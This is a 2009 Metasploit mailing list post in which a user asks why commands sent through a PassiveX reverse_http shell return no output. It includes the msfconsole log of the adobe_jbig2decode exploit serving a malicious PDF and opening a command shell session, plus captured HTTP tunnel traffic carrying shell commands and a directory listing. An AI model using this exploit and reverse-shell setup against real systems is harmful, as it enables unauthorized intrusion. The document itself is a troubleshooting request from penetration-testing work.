Metasploit mailing list archives
problem with passiveX (reverse_http) payloads: nothing in return to commands
From: irian2003 at yahoo.com (Bogdan Sandu)
Date: Fri, 3 Apr 2009 14:53:28 -0700 (PDT)
Hello, I have a problem with the reverse_http payloads. The exploit succedes and looking with tcpdump at the traffic between the proxy server and the port of the payload I see the commands being executed, but after interacting with the session I see nothing returned to my commands: ---------------------------- GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Pragma: no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive ?HTTP/1.1 200 OK Content-Length: 4 Server: Rex Connection: close? Dir ------------------------------------ GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Pragma: no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive ----------------------------------- POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Content-Length: 1024 Pragma: no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive? dir ?Volume in drive C has no label. Volume Serial Number is 0CAA-3013? ?Directory of C:\Documents and Settings\irian\Desktop? 04/03/2009 11:43 PM <DIR> . 04/03/2009 11:43 PM <DIR> .. 04/01/2009 10:09 AM 27,136 Activ.doc 02/27/2009 12:09 PM 169,984 carte optional.doc 03/07/2009 12:48 PM 131 jboss.txt 04/02/2009 03:48 AM 288,237 lo.cap 03/30/2009 12:17 PHTTP/1.1 200 OK Content-Length: 0 Server: Rex Connection: Keep-Alive ----------------------------- POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Content-Length: 230 Pragma: no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive? M 247,666 users_guide.pdf 03/25/2009 10:32 PM 24,064 youtube.doc 15 File(s) 2,111,721 bytes 3 Dir(s) 959,123,456 bytes free? C:\Documents and Settings\irian\Desktop>HTTP/1.1 200 OK Content-Length: 0 Server: Rex Connection: Keep-Alive ---------------------------------------- msf exploit(adobe_jbig2decode) > exploit [*] Exploit running as background job. msf exploit(adobe_jbig2decode) > [*] PassiveX listener started. [*] Using URL: http://0.0.0.0:8080/carti.pdf [*] Local IP: http://1.2.3.4:8080/carti.pdf [*] Server started. [*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 1.2.3.4:50007... [*] Sending PassiveX main page to client [*] Sending PassiveX main page to client [*] Command shell session 1 opened (Local Pipe -> Remote Pipe) [*] Sending stage to sid 2 (474 bytes) msf exploit(adobe_jbig2decode) > sessions -l Active sessions =============== ? Id Description Tunnel ? -- ----------- ------ ? 1 Command shell Local Pipe -> Remote Pipe msf exploit(adobe_jbig2decode) > sessions -i 1 [*] Starting interaction with 1... ls dir dir Any ideeas why this is happening.Thanks a lot and keep up doing a great job. Bogdan -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090403/048cef1b/attachment.htm>
Current thread:
- problem with passiveX (reverse_http) payloads: nothing in return to commands Bogdan Sandu (Apr 03)